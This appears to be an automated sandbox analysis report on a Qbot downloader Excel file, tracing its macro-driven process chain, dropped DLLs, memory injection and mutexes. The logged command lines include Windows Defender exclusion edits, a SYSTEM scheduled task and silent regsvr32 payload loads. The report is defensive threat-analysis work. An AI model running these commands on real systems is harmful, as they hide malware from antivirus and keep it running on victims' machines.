Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10016EB0	5_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10012346	5_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10011758	5_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10014FC0	5_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00096EB0	6_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00092346	6_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00091758	6_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00094FC0	6_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111424	9_2_02111424
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726	9_2_02113726
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211242A	9_2_0211242A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02112C41	9_2_02112C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02114495	9_2_02114495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211B114	9_2_0211B114
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111000	9_2_02111000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111D89	9_2_02111D89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111827	9_2_02111827
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_021134DA	9_2_021134DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111C5D	9_2_02111C5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113073	9_2_02113073
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02114162	9_2_02114162
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_021132EB	9_2_021132EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_10016EB0	9_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_10012346	9_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_10011758	9_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_10014FC0	9_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00096EB0	11_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00092346	11_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00091758	11_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00094FC0	11_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00492C41	13_2_00492C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0049242A	13_2_0049242A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00491424	13_2_00491424
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00493726	13_2_00493726
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_004934DA	13_2_004934DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00491C5D	13_2_00491C5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_004932EB	13_2_004932EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00494162	13_2_00494162
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00493073	13_2_00493073
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00491D89	13_2_00491D89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00491000	13_2_00491000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00494495	13_2_00494495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0049B114	13_2_0049B114
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00491827	13_2_00491827
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10016EB0	13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10012346	13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10011758	13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10014FC0	13_2_10014FC0

Source: #Qbot downloader.xls	OLE, VBA macro line: Sub auto_open()
Source: #Qbot downloader.xls	OLE, VBA macro line: Sub auto_close()
Source: #Qbot downloader.xls	OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: #Qbot downloader.xls	OLE, VBA macro line: Private Sub saWorkbook_Opensa()

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	5_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	5_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	9_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	9_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	13_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	13_2_1000CB77

Source: Drezd.red.6.dr	Static PE information: No import functions for PE file found
Source: Drezd1.red.11.dr	Static PE information: No import functions for PE file found
Source: Drezd.red.15.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0'

Source: #Qbot downloader.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\Drezd.red 17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
Source: Joe Sandbox View	Dropped File: C:\Users\user\Drezd1.red 17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: .................................&B.....(.P.....................h.......q.......................................................................	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................L...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Waizacawzvcu' /d '0'
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Waizacawzvcu' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Application Data\Microsoft\Forms

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD039.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@29/9@0/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

5_2_1000D523

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: #Qbot downloader.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

5_2_1000ABA3

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{79026B85-90C1-43F3-A2DF-F4065FED7914}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{951063CE-E915-4714-9BB2-18C99CF5C054}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\Global\{951063CE-E915-4714-9BB2-18C99CF5C054}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{6635E7B2-F3EC-4B2A-A325-70E2A0F97BF5}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{79026B85-90C1-43F3-A2DF-F4065FED7914}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6635E7B2-F3EC-4B2A-A325-70E2A0F97BF5}

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001A00E push ebx; ret	5_2_1001A00F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001D485 push FFFFFF8Ah; iretd	5_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001D4B6 push FFFFFF8Ah; iretd	5_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10019D5C push cs; iretd	5_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10019E5E push cs; iretd	5_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001BB29 push esi; iretd	5_2_1001BB2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0009A00E push ebx; ret	6_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0009D485 push FFFFFF8Ah; iretd	6_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0009D4B6 push FFFFFF8Ah; iretd	6_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00099D5C push cs; iretd	6_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_00099E5E push cs; iretd	6_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0009BB29 push esi; iretd	6_2_0009BB2E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111424 push 00000000h; mov dword ptr [esp], ecx	9_2_02111460
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02111424 push 00000000h; mov dword ptr [esp], ecx	9_2_0211159D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], ebp	9_2_0211376E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], edx	9_2_02113A0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], esi	9_2_02113B55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push esi; mov dword ptr [esp], 00000001h	9_2_02113D71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], ecx	9_2_02113D9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], ebp	9_2_02113E46
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], esi	9_2_02113E72
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], esi	9_2_02113F52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02113726 push 00000000h; mov dword ptr [esp], ebp	9_2_02113F76
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211242A push 00000000h; mov dword ptr [esp], esi	9_2_0211276D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211242A push 00000000h; mov dword ptr [esp], edi	9_2_0211288F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211242A push 00000000h; mov dword ptr [esp], ebx	9_2_021128C3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0211242A push 00000000h; mov dword ptr [esp], edi	9_2_02112B65
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02112C41 push 00000000h; mov dword ptr [esp], esi	9_2_02112D71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02112C41 push 00000000h; mov dword ptr [esp], esi	9_2_02112E73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02112C41 push 00000000h; mov dword ptr [esp], esi	9_2_0211336F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02112C41 push 00000000h; mov dword ptr [esp], ebp	9_2_021133F4

Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name: .rdatat
Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name: .rdatat
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name: .rdatat
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[2].dat.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name: .rdatat
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd1.red.0.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name: .rdatat
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd.red.6.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name: .rdatat
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd1.red.11.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name: .rdatat
Source: Drezd.red.15.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name:
Source: Drezd.red.15.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000DFAD LoadLibraryA,GetProcAddress,

5_2_1000DFAD

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd1.red	Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red	Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd1.red	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat	Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat	Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd1.red			Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd1.red			Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1172 base: EE102D value: E9 BA 4C 1A FF	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 236 base: EE102D value: E9 BA 4C 1A FF	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1308 base: EE102D value: E9 BA 4C 1A FF	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
